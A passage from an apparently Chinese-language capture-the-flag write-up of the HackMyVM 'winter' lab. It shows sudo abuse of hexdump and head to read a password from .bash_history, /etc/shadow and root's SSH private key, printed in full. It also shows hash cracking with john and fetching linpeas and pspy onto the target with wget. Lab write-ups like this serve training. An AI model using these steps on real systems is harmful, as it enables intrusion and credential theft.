A6lC\/6lvyFB3HsIRdfHobZqqmx+p1ScqMOC76ipAtPmm5\/PksCX1CqB177U5T2DBgc5YQH7nKWimdkRa4+F9m7um9xX3wG6mlPio55GNTLEh7Gu9PBL8J5YZEtWpq5xTT9eyVpD8FmcAAACBAM2N\/hAmLvA0+gi7QOhJ6\/w+CwtPv5KgfexlnPP2E8378aJu5g+OZLT1OYXMChisuHSFCkBoERSrEXQhIt\/EAUadAUM1IankXPyynxGVIWmsXT694KhlMImDeS1NCthro2lQC0FKYWS8NgtE96SbO2WiaRzHBbkhrl6RFYKd4KafAAAADmNhdGNobWVAd2ludGVyAQIDBA==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u5bf9\u6bd4\u4e4b\u524d\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAtSSNUmO20FJnIGGtm5gWD3xA1ZGfg4xmVtWFo5uVLG8WBtKwTMbP\neT0Rxp229aQ4bkpgb2EVKQjeElXRG9DjhRARkCm\/IaFwT8TdS3RPhrH5DE3GMdwDZFaKaI\nJ7QcZosMLT+o5eE71ki2ZBJHgiCqeiJG1dM+V2W7gXrq6vCAVWgJ69KQVaxV1qmNE71Kkj\n1CnkBFonsf9tQt12GJm\/u8bvWHAI4ZOunc6oSVEOQWU0dw2oPC+QDyr007T\/bmlXmNzPmO\njfDvFxe79XsBkMxgvwnQJU6qH08fL8+2FFzyIhfq\/DffGZXtd3GC9ojsUPp+lYeNDpHH5n\ndi9mSDiz+QAAA8jMA566zAOeugAAAAdzc2gtcnNhAAABAQC1JI1SY7bQUmcgYa2bmBYPfE\nDVkZ+DjGZW1YWjm5UsbxYG0rBMxs95PRHGnbb1pDhuSmBvYRUpCN4SVdEb0OOFEBGQKb8h\noXBPxN1LdE+GsfkMTcYx3ANkVopogntBxmiwwtP6jl4TvWSLZkEkeCIKp6IkbV0z5XZbuB\neurq8IBVaAnr0pBVrFXWqY0TvUqSPUKeQEWiex\/21C3XYYmb+7xu9YcAjhk66dzqhJUQ5B\nZTR3Dag8L5APKvTTtP9uaVeY3M+Y6N8O8XF7v1ewGQzGC\/CdAlTqofTx8vz7YUXPIiF+r8\nN98Zle13cYL2iOxQ+n6Vh40Okcfmd2L2ZIOLP5AAAAAwEAAQAAAQAWAnH1b843s7t6EMRC\nYpFTolpSWNZT6oxIwrrxLSdL9ddsTs9DFOkCpyvwwRsI78I3jGv5PIeQq9YnziuRQKlUcq\nZfqOLjWDVIS\/hDgcdj614CY7TQPBZha653klsdm9j+mT2edQvzRBDiazNBFiO0vbeSy4MG\nmjvuWwjtnaYAyEjeO8zh9NQXAGrLiYxsyBhEDctV9QN3E\/2xgn0G721rbbsX6qmz+RltW3\nDFLCFTjQiLJe+b4ymHp5LtoC8rnbpJAqiuAOnJwwro88LSuqG+o+xyGvMoEKjM5peQs\/g5\n68UjewXH56h9DGvTi+zUmP0fQh6R2LS3slndyhY33Ze9AAAAgQDgxkLWaV6VaR19vJSKuE\nbzOafz1VXIAebeY0rzF65IVuZPeu8i4er5E+DF2CCoFHFa09glWj6S\/0qphHiqF0QhkTOV\n3bmzmHMPb7az\/0+ll\/95qpxRZy3h3XRaC8PwMPcynDFMIgcp\/UOfpt\/BA0S5+m4suU77ew\nMWBMFn1PcxnwAAAIEA4ZjhEN9rQ2FWoDQIXul24EadZ0LBDPrkA6lC\/6lvyFB3HsIRdfHo\nbZqqmx+p1ScqMOC76ipAtPmm5\/PksCX1CqB177U5T2DBgc5YQH7nKWimdkRa4+F9m7um9x\nX3wG6mlPio55GNTLEh7Gu9PBL8J5YZEtWpq5xTT9eyVpD8FmcAAACBAM2N\/hAmLvA0+gi7\nQOhJ6\/w+CwtPv5KgfexlnPP2E8378aJu5g+OZLT1OYXMChisuHSFCkBoERSrEXQhIt\/EAU\nadAUM1IankXPyynxGVIWmsXT694KhlMImDeS1NCthro2lQC0FKYWS8NgtE96SbO2WiaRzH\nBbkhrl6RFYKd4KafAAAADmNhdGNobWVAd2ludGVyAQIDBA==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u5b8c\u7f8e\uff0c\u5c1d\u8bd5\u767b\u5f55\uff0c\u53d1\u73b0\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ssh catchme@192.168.10.106 -i catchme\ncatchme@192.168.10.106&#039;s password:<\/code><\/pre>\n<p>\u88ab\u5751\u4e86\uff1f\u67e5\u4e00\u4e0b\uff0c\u6211\u611f\u89c9\u8fd9\u91cc\u6709\u732b\u817b\uff0c\u56e0\u4e3a\u524d\u4e0d\u4e45\u6211\u624d\u548c\u7fa4\u4e3b\u804a\u8fc7\u8fd9\u4e2a\u5751\u4eba\u529e\u6cd5\uff0c\u7ed3\u679c\u4ed6\u5c31\u63a8\u8350\u6211\u505a\u8fd9\u4e2a\u9776\u673a\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ssh-keygen -y -f catchme                                       \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1JI1SY7bQUmcgYa2bmBYPfEDVkZ+DjGZW1YWjm5UsbxYG0rBMxs95PRHGnbb1pDhuSmBvYRUpCN4SVdEb0OOFEBGQKb8hoXBPxN1LdE+GsfkMTcYx3ANkVopogntBxmiwwtP6jl4TvWSLZkEkeCIKp6IkbV0z5XZbuBeurq8IBVaAnr0pBVrFXWqY0TvUqSPUKeQEWiex\/21C3XYYmb+7xu9YcAjhk66dzqhJUQ5BZTR3Dag8L5APKvTTtP9uaVeY3M+Y6N8O8XF7v1ewGQzGC\/CdAlTqofTx8vz7YUXPIiF+r8N98Zle13cYL2iOxQ+n6Vh40Okcfmd2L2ZIOLP5 catchme@winter<\/code><\/pre>\n<p>\u5636\uff0c\u5bf9\u7684\u5440\uff0c\u770b\u770b\u516c\u94a5\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/.ssh\/authorized_keys&quot; | awk -F &#039;[|]&#039; &#039;{print $2}&#039; | tr -d &#039;\\n.&#039;\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1JI1SY7bQUmcgYa2bmBYPfEDVkZ+DjGZW1YWjm5UsbxYG0rBMxs95PRHGnbb1pDhuSmBvYRUpCN4SVdEb0OOFEBGQKb8hoXBPxN1LdE+GsfkMTcYx3ANkVopogntBxmiwwtP6jl4TvWSLZkEkeCIKp6IkbV0z5XZbuBeurq8IBVaAnr0pBVrFXWqY0TvUqSPUKeQEWiex\/21C3XYYmb+7xu9YcAjhk66dzqhJUQ5BZTR3Dag8L5APKvTTtP9uaVeY3M+Y6N8O8XF7v1ewGQzGC\/CdAlTqofTx8vz7YUXPIiF+r8N98Zle13cYL2iOxQ+n6Vh40Okcfmd2L2ZIOLP5 catchme@winter<\/code><\/pre>\n<p>\u4e00\u6837\u7684\u554a\u3002\u3002\u3002\u3002\u3002\u795e\u9b54\u60c5\u51b5\uff0c\u8bfb\u4e00\u4e0b\u5176\u4ed6\u654f\u611f\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/.profile&quot; | awk -F &#039;[|]&#039; &#039;{print $2}&#039; | tr -d &#039;\\n.&#039;\n# ~\/profile: executed by the command interpreter for login shells# This file is not read by bash(1), if ~\/bash_profile or ~\/bash_login# exists# see \/usr\/share\/doc\/bash\/examples\/startup-files for examples# the files are located in the bash-doc package# the default umask is set in \/etc\/profile; for setting the umask# for ssh logins, install and configure the libpam-umask package#umask 022# if running bashif [ -n &quot;$BASH_VERSION&quot; ]; then    # include bashrc if it exists    if [ -f &quot;$HOME\/bashrc&quot; ]; then &quot;$HOME\/bashrc&quot;    fifi# set PATH so it includes user&#039;s private bin if it existsif [ -d &quot;$HOME\/bin&quot; ] ; then    PATH=&quot;$HOME\/bin:$PATH&quot;fi# set PATH so it includes user&#039;s private bin if it existsif [ -d &quot;$HOME\/local\/bin&quot; ] ; then    PATH=&quot;$HOME\/local\/bin:$PATH&quot;fi\n(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/.bash_history&quot; | awk -F &#039;[|]&#039; &#039;{print $2}&#039; | tr -d &#039;\\n.&#039;\nMy Password is : winterusercatchexit<\/code><\/pre>\n<p>\u627e\u5230\u5bc6\u7801\uff0c\u771f\u9634\u95f4\u3002\u3002\u3002\u3002\u4f46\u662f\u8fd8\u662f\u767b\u4e0d\u4e0a\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@winter:\/var\/www\/cmd$ su -l catchme\nPassword: \nsu: Authentication failure<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7ed3\u5408\u767b\u5f55\uff0c\u53d1\u73b0\u4e5f\u4e0d\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ssh catchme@192.168.10.106 -i catchme\ncatchme@192.168.10.106&#039;s password: \nPermission denied, please try again.<\/code><\/pre>\n<p>\u7136\u540e\u5076\u7136\u53d1\u73b0\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/.bash_history&quot;                                          \n00000000  4d 79 20 50 61 73 73 77  6f 72 64 20 69 73 20 3a  |My Password is :|\n00000010  20 77 69 6e 74 65 72 75  73 65 72 63 61 74 63 68  | winterusercatch|\n00000020  0a 65 78 69 74 0a                                 |.exit.|\n00000026<\/code><\/pre>\n<p>\u4f7f\u7528<code>winterusercatch<\/code>\u767b\u5f55\u6210\u529f\u3002\u3002\u3002\u3002\u3002\u3002\u6211\u8fd9\u662f\u88ab\u9884\u5224\u4e86\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253555.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819015338899\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<p>\u7a81\u53d1\u5947\u60f3\uff0c\u5148\u662f\u5c1d\u8bd5\u7206\u7834\u4e86hash\uff1a<\/p>\n<pre><code class=\"language-bash\">catchme@winter:~$ sudo -l\nMatching Defaults entries for catchme on winter:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser catchme may run the following commands on winter:\n    (root) NOPASSWD: \/usr\/bin\/head\ncatchme@winter:~$ sudo \/usr\/bin\/head \/etc\/shadow\nroot:$6$eAq4A9wnHPOQN\/H9$bjVS7Hla7b5cJwsbyJYGxrrbvt62vSyhHA0kChdAXYTxJKactVZt7T\/a1\/eSl9hbGGIrfMiXqb6baOS\/9NiWu.:18593:0:99999:7:::\ndaemon:*:18593:0:99999:7:::\nbin:*:18593:0:99999:7:::\nsys:*:18593:0:99999:7:::\nsync:*:18593:0:99999:7:::\ngames:*:18593:0:99999:7:::\nman:*:18593:0:99999:7:::\nlp:*:18593:0:99999:7:::\nmail:*:18593:0:99999:7:::\nnews:*:18593:0:99999:7:::\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128\/128 SSE2 2x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:59 0.40% (ETA: 18:02:03) 0g\/s 1143p\/s 1143c\/s 1143C\/s jadee..google3\nSession aborted<\/code><\/pre>\n<p>\u61d2\u5f97\u7b49\u4e86\uff0c\u4f30\u8ba1\u4e5f\u6574\u4e0d\u51fa\u6765\uff0c\u539f\u4ee5\u4e3a\u4f5c\u8005\u4f1a\u8bbe\u7f6e\u9677\u9631\uff0c\u7ed3\u679c\u76f4\u63a5\u6b63\u5e38\u4f7f\u7528\u5c31\u51fa\u6765\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">catchme@winter:~$ sudo \/usr\/bin\/head \/root\/root.txt\nHMV_127.0.0.1\ncatchme@winter:~$ sudo \/usr\/bin\/head \/root\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA4F18HTzuOk3Paoz2Lw+zBanzInzlLNmaX0WWE+qvRmIKtxsPqacg\nOVA\/sHTHAm\/Ey\/CpmdIvRUbPhmfeaDapO2qkgrmHYL+PyQ2I4UmkYxVFlogWaKIFqAi93X\nFZKDxTh5Vi2zieUmgMBRlYOaXcltJrYfF+CkBrwRFDEDRZ\/csG9\/mFBEyeZTTpNAe5VuPm\nRUoE0ynRvrf4UskGwJy2PvzHzqylwMR7ZWRwOeh8DsVHMiAmMhhX8eeJNKi2COtgcKvSiO\nFr1AmLYA8O1i+KvXSuBf2LqXZvfeI3OywLbmwhmaPYJEqiinmmv6kyfOeyupknnrxYqCob\n5KIkOQ6JjwAAA8ARV3ofEVd6HwAAAAdzc2gtcnNhAAABAQDgXXwdPO46Tc9qjPYvD7MFqf\nMifOUs2ZpfRZYT6q9GYgq3Gw+ppyA5UD+wdMcCb8TL8KmZ0i9FRs+GZ95oNqk7aqSCuYdg\nv4\/JDYjhSaRjFUWWiBZoogWoCL3dcVkoPFOHlWLbOJ5SaAwFGVg5pdyW0mth8X4KQGvBEU\ncatchme@winter:~$ sudo \/usr\/bin\/head -n 100 \/root\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA4F18HTzuOk3Paoz2Lw+zBanzInzlLNmaX0WWE+qvRmIKtxsPqacg\nOVA\/sHTHAm\/Ey\/CpmdIvRUbPhmfeaDapO2qkgrmHYL+PyQ2I4UmkYxVFlogWaKIFqAi93X\nFZKDxTh5Vi2zieUmgMBRlYOaXcltJrYfF+CkBrwRFDEDRZ\/csG9\/mFBEyeZTTpNAe5VuPm\nRUoE0ynRvrf4UskGwJy2PvzHzqylwMR7ZWRwOeh8DsVHMiAmMhhX8eeJNKi2COtgcKvSiO\nFr1AmLYA8O1i+KvXSuBf2LqXZvfeI3OywLbmwhmaPYJEqiinmmv6kyfOeyupknnrxYqCob\n5KIkOQ6JjwAAA8ARV3ofEVd6HwAAAAdzc2gtcnNhAAABAQDgXXwdPO46Tc9qjPYvD7MFqf\nMifOUs2ZpfRZYT6q9GYgq3Gw+ppyA5UD+wdMcCb8TL8KmZ0i9FRs+GZ95oNqk7aqSCuYdg\nv4\/JDYjhSaRjFUWWiBZoogWoCL3dcVkoPFOHlWLbOJ5SaAwFGVg5pdyW0mth8X4KQGvBEU\nMQNFn9ywb3+YUETJ5lNOk0B7lW4+ZFSgTTKdG+t\/hSyQbAnLY+\/MfOrKXAxHtlZHA56HwO\nxUcyICYyGFfx54k0qLYI62Bwq9KI4WvUCYtgDw7WL4q9dK4F\/Yupdm994jc7LAtubCGZo9\ngkSqKKeaa\/qTJ857K6mSeevFioKhvkoiQ5DomPAAAAAwEAAQAAAQBP+eLhBTQiAlR6Na8X\njXASB8eMNpr2hsaZSVO628AIxa\/uHy5RGirJY0qgmq\/JtY+f5rR+CUciWaBl16aW3U0ryd\nLEal\/QY9hcIX\/2VmrLiuyYQQBD4eVERYFwaxQN3JslzGFFpYQB+ea29pbVTcM42969Nfjo\nrJf8ZSvTneWqKkbrd4wC7rdwyT4MkvLMXcddDUq96lpZtTTrHK7UrnEEUyxvLGdicDEsHY\nOIN0R+Jy6PWYcqbqdG77Tz\/COdqJK6F1AmZj2T2vSNgVqpJjRZSfJN3U5\/1OZnEu00Cyjb\n+3XhhNNKRlW\/iM9LOzq1D8L3Lm\/mKgkK\/AtHO3X8VScBAAAAgAEbod+nBWtuRkezkQY3Yh\nt1+7eXXIPjF2JTs1XonZ47\/BbSO8ndQhYv\/5j1RjubfENuQCqJzldFSv4INS3aaXfBzzmV\n+7+rA5ce4N53vLKdmZWrbx33aCl\/mwM7VsZ1HhqDighl+EB4F0pE4KdMdscLcOyv1pc+w4\njFQd195s7NAAAAgQD3OlnliepszrdY\/vlKdSpbUTU5Cx77t6d9bod1Fs37a\/a0SRfswFw\/\n7MS2ex56bU7wo7PE2qXJGEySEg3dFJhVNsRfAiR0j95MfTITXOmQ2vyrxdqppSguTnh+Xi\nuismWUWljX+6ylmq69aYtpKu1t1eF3zuL1kcViG4lPtd\/SDwAAAIEA6FN2zCwZeC00j12P\nDFcM6BSAA\/70OdNNNG+04p7HxkR5bWj4Yi386N\/Epf18B4LCokX3GPCMvatAVx+cucpzPE\npwoFaowj+STiVvzTZwd6vODETD1h1MKLRQMmdTcTb5yWMpxAoih7GeiusGWNQl0VDAmFfj\nTVtPYwN8hEFPUIEAAAALcm9vdEB3aW50ZXI=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u76f4\u63a5\u8fde\u63a5\uff1a<\/p>\n<pre><code class=\"language-bash\">catchme@winter:~$ sudo \/usr\/bin\/head -n 100 \/root\/.ssh\/id_rsa &gt; \/tmp\/root;chmod 600 root;ssh root@0.0.0.0 -i \/tmp\/root\nchmod: cannot access &#039;root&#039;: No such file or directory\nThe authenticity of host &#039;0.0.0.0 (0.0.0.0)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:E0JgyRYELVg9dlfTjBbGIKzEtMhHYjrAxaFtqd7OWNs.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added &#039;0.0.0.0&#039; (ECDSA) to the list of known hosts.\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0644 for &#039;\/tmp\/root&#039; are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.\nLoad key &quot;\/tmp\/root&quot;: bad permissions\nroot@0.0.0.0&#039;s password: <\/code><\/pre>\n<p>\u8fd9\u91cc\u7a81\u7136\u77e5\u9053\u4e86\u4e3a\u5565\u4f1a\u5bfc\u81f4\u79c1\u94a5\u8fde\u4e0d\u4e0a\u53bb\u4e86\uff0c\u53ef\u80fd\u662f\u56e0\u4e3a\u79c1\u94a5\u6743\u9650\u7b49\u7ea7\u6bd4\u8f83\u4f4e\uff0c\u5bfc\u81f4\u67d0\u4e9b\u7528\u6237\u80fd\u770b\u5230\u3002<\/p>\n<p>\u5c1d\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">catchme@winter:~$ sudo \/usr\/bin\/head -n 100 \/root\/.ssh\/id_rsa &gt; \/home\/catchme\/root;chmod 600 root;ssh root@0.0.0.0 -i \/home\/catchme\/root\nroot@0.0.0.0&#039;s password: \n\ncatchme@winter:~$ ls -la\ntotal 48\ndrwx------ 5 catchme catchme 4096 Aug 18 23:31 .\ndrwxr-xr-x 3 root    root    4096 Dec  1  2020 ..\n-rw------- 1 catchme catchme   38 Dec  2  2020 .bash_history\n-rw-r--r-- 1 catchme catchme  220 Nov 27  2020 .bash_logout\n-rw-r--r-- 1 catchme catchme 3526 Nov 27  2020 .bashrc\ndrwx------ 3 catchme catchme 4096 Nov 30  2020 .gnupg\ndrwxr-xr-x 3 catchme catchme 4096 Nov 30  2020 .local\n-rw-r--r-- 1 catchme catchme  807 Nov 27  2020 .profile\n-rw------- 1 catchme catchme 1811 Aug 18 23:31 root\n-rw-r--r-- 1 catchme catchme   66 Nov 30  2020 .selected_editor\ndrwxrwxrwx 2 catchme catchme 4096 Aug 18 23:29 .ssh\n-rw-r--r-- 1 catchme catchme   13 Dec  1  2020 user.txt<\/code><\/pre>\n<p>\u53d1\u73b0\u8fd8\u662f\u4e0d\u884c\u3002\u3002\u3002\u3002\u3002\u4f30\u8ba1\u53c8\u88ab\u5751\u4e86\uff0c\u4e0d\u662f\u8bfb\u79c1\u94a5\uff0c\u6216\u8005\u79c1\u94a5\u4e0d\u5bf9\uff0c\u8bfb\u53d6\u5176\u4ed6\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">catchme@winter:~$ ssh-keygen -y -f root\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgXXwdPO46Tc9qjPYvD7MFqfMifOUs2ZpfRZYT6q9GYgq3Gw+ppyA5UD+wdMcCb8TL8KmZ0i9FRs+GZ95oNqk7aqSCuYdgv4\/JDYjhSaRjFUWWiBZoogWoCL3dcVkoPFOHlWLbOJ5SaAwFGVg5pdyW0mth8X4KQGvBEUMQNFn9ywb3+YUETJ5lNOk0B7lW4+ZFSgTTKdG+t\/hSyQbAnLY+\/MfOrKXAxHtlZHA56HwOxUcyICYyGFfx54k0qLYI62Bwq9KI4WvUCYtgDw7WL4q9dK4F\/Yupdm994jc7LAtubCGZo9gkSqKKeaa\/qTJ857K6mSeevFioKhvkoiQ5DomP\ncatchme@winter:~$ sudo \/usr\/bin\/head -n 100 \/root\/.ssh\/authorized_keys\n\/usr\/bin\/head: cannot open &#039;\/root\/.ssh\/authorized_keys&#039; for reading: No such file or directory<\/code><\/pre>\n<p>\u7834\u6848\u4e86\uff0c\u8fd9\u4e2a\u5751\u8d27\uff01\u6211\u4eec\u53ef\u4ee5\u8bfb\u53d6\u4efb\u610f\u5df2\u77e5\u6587\u4ef6\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u5b58\u5728\u53ef\u4ee5\u5229\u7528\u7684\u70b9\uff1a<\/p>\n<pre><code class=\"language-bash\">catchme@winter:\/$ cd home\ncatchme@winter:\/home$ ls -la\ntotal 16\ndrwxr-xr-x  3 root    root    4096 Dec  1  2020 .\ndrwxr-xr-x 18 root    root    4096 Nov 27  2020 ..\ndrwx------  5 catchme catchme 4096 Aug 18 23:39 catchme\n-rw-r--r--  1 root    root      32 Dec  1  2020 hint.txt\ncatchme@winter:\/home$ cat hint.txt \nenumerate as much as you can :)<\/code><\/pre>\n<p>\u76f4\u63a5\u7529\u4e00\u4e2a linpeas \u4e0a\u53bb\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888                                                   \nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.106 - - [18\/Aug\/2024 14:21:02] &quot;GET \/linpeas.sh HTTP\/1.1&quot; 200 -\n\n# winter\ncatchme@winter:\/tmp$ wget http:\/\/192.168.10.105:8888\/linpeas.sh\n--2024-08-18 23:51:08--  http:\/\/192.168.10.105:8888\/linpeas.sh\nConnecting to 192.168.10.105:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh                                      100%[====================================================================================================&gt;] 840.38K  --.-KB\/s    in 0.05s   \n\n2024-08-18 23:51:08 (15.0 MB\/s) - \u2018linpeas.sh\u2019 saved [860549\/860549]\n\ncatchme@winter:\/tmp$ chmod +x *<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Cron jobs\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#scheduled-cron-jobs\n\/usr\/bin\/crontab\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use &#039;*&#039; in these fields (for &#039;any&#039;).\n# \n# Notice that tasks will be started based on the cron&#039;s system\n# daemon&#039;s notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n# For more information see the manual pages of crontab(5) and cron(8)\n# \n# m h  dom mon dow   command\n* * * * * catchme python3 \/home\/catchme\/read.py\n* * * * * (sleep 30;python3 \/home\/catchme\/read.py)\nincrontab Not Found\n-rw-r--r-- 1 root root    1042 Oct 11  2019 \/etc\/crontab<\/code><\/pre>\n<p>\u5b58\u5728\u5b9a\u65f6\u4efb\u52a1\uff0c\u4f46\u662f\u6211\u4eec\u8fd9\u91cc\u6ca1\u6709\u627e\u5230\u8fd9\u4e2a\u811a\u672c\uff0c\u867d\u7136\u90fd\u662f\u7528 catchme \u8eab\u4efd\u8fd0\u884c\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5\u4e0a\u4f20 pspy64\uff0c\u7136\u540e\u8fdb\u884c\u68c0\u6d4b\u8fdb\u7a0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.106 - - [18\/Aug\/2024 14:37:27] &quot;GET \/lpspy64 HTTP\/1.1&quot; 200 -\n\n# winter\ncatchme@winter:\/tmp$ wget http:\/\/192.168.10.105:8888\/lpspy64\n--2024-08-19 00:07:33--  http:\/\/192.168.10.105:8888\/lpspy64\nConnecting to 192.168.10.105:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3104768 (3.0M) [application\/octet-stream]\nSaving to: \u2018lpspy64\u2019\n\nlpspy64                                         100%[====================================================================================================&gt;]   2.96M  --.-KB\/s    in 0.08s   \n\n2024-08-19 00:07:33 (35.1 MB\/s) - \u2018lpspy64\u2019 saved [3104768\/3104768]\n\ncatchme@winter:\/tmp$ chmod +x *\ncatchme@winter:\/tmp$ .\/lpspy64<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253556.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819023926917\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u662f\u4e00\u4e2a\u5c0f\u5c1d\u8bd5\u54c8\uff0c\u4f46\u662f\u663e\u7136\u6ca1\u6709\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">catchme@winter:\/tmp$ cat \/home\/catchme\/read.py\nimport os\nos.system(&#039;chmod +s 